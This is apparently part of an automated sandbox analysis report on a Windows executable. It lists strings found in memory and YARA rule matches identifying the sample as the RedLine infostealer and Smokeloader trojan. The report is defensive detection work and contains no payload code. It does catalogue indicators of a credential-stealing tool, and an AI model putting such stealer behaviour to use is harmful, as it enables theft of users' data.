                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response$9
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response(
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Igv6ymbAA3.exe, 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.401980636.00000000025EE000.00000004.00000020.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BA8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BA8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BA8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BA8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BA8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Igv6ymbAA3.exe, 00000000.00000002.401213502.000000000097A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.3.Igv6ymbAA3.exe.2450000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.262f71e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.3.Igv6ymbAA3.exe.9ee370.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2700ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2700000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.262f71e.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2850000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.262e836.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2700ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2410e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.262e836.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2850000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.Igv6ymbAA3.exe.2700000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.3.Igv6ymbAA3.exe.9ee370.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.401246578.0000000000989000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: Igv6ymbAA3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.3.Igv6ymbAA3.exe.2450000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Malware_Imphash_Mar23_1 date = 2023-03-20, author = Arnim Rupp, description = Detects malware by known bad imphash or rich_pe_header_hash, score = 167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc, reference = https://yaraify.abuse.ch/statistics/, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, modified = 2023-03-22, hash = 866e3ea86671a62b677214f07890ddf7e8153bec56455ad083c800e6ab51be37
